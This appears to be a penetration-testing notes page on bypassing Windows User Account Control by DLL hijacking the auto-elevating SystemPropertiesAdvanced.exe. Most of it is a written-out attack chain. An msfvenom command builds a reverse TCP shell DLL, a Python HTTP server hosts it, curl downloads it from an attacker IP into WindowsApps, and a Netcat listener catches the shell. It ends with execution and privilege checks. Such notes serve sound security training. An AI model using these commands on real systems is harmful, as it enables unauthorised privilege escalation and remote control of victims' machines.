search
LinkedInGithub
githubEdit

user-account-control

hashtag
whoami command to check current user information

whoami /user

hashtag
List members of the administrators group

net localgroup administrators

hashtag
Display the privileges of the current user

whoami /priv

hashtag
Query registry to check if UAC is enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

hashtag
Query registry for administrator consent prompt behavior

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

hashtag
Get the OS version using PowerShell

[environment]::OSVersion.Version

hashtag
Print the PATH environment variable

cmd /c echo %PATH%

hashtag
List tasks and filter for rundll32 processes

# Useful to identify suspicious rundll32 usage
tasklist /svc | findstr "rundll32"

hashtag
Kill a process by specifying its PID

hashtag
Generate a reverse TCP shell DLL using msfvenom

hashtag
Start a Python HTTP server to host the DLL payload

hashtag
Download the DLL file from the attacker's server using curl

hashtag
Set up Netcat listener to capture the reverse shell

hashtag
Execute the DLL payload using rundll32

hashtag
Open advanced system properties dialog

hashtag
Confirm the current user after potential privilege escalation

hashtag
Key Concepts:

  • UAC Functionality: - UAC prompts for elevation when applications require administrator privileges. - It separates standard user and administrator tokens. - It is a security convenience, not a security boundary.

  • UAC Bypass: - Leveraging vulnerabilities or unintended behavior in Windows binaries. - DLL hijacking is a common technique. - SystemPropertiesAdvanced.exe is a auto elevating binary.

  • DLL Hijacking: - Placing a malicious DLL in a directory where a trusted binary searches for it. - Windows DLL search order is critical. Approach, Commands, Tools, and Techniques:

  1. UAC and User Information Gathering: - whoami /user (Check current user). - net localgroup administrators (Verify admin group membership). - whoami /priv (Review user privileges). - REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA (Check if UAC is enabled). - REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin (Check UAC level). - [environment]::OSVersion.Version (PowerShell: Check Windows version). - cmd /c echo %PATH% (Review PATH environment variable). - tasklist /svc | findstr "rundll32" (List running rundll32 processes). - taskkill /PID <pid> /F (Kill rundll32 processes).

  2. Malicious DLL Generation and Transfer: - msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll (Generate malicious DLL). - python3 -m http.server <port> (Start HTTP server). - curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll" (Download DLL).

  3. Listener Setup: - nc -lvnp <attacker_port> (Start Netcat listener).

  4. Testing and Exploitation: - rundll32 shell32.dll,Control_RunDLL C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll (Test DLL execution). - C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe (Execute vulnerable binary).

  5. Verification: - whoami (Verify elevated privileges). - whoami /priv (Verify elevated privileges)

Commands:

  • whoami

  • net localgroup administrators

  • REG QUERY

  • cmd /c echo %PATH%

  • tasklist

  • taskkill

  • msfvenom

  • python3 -m http.server

  • curl

  • nc

  • rundll32 Tools:

  • msfvenom (Metasploit)

  • nc (Netcat) Techniques:

  • UAC bypass.

  • DLL hijacking.

  • Exploiting auto-elevating binaries. Key Considerations:

  • Windows version and build number are critical for UAC bypass selection.

  • DLL search order.

  • Attacker controlled IP addresses and Ports.

  • Process cleanup.

Previousrestricted-environments-citrix-breakoutNextvulnerable-services

Last updated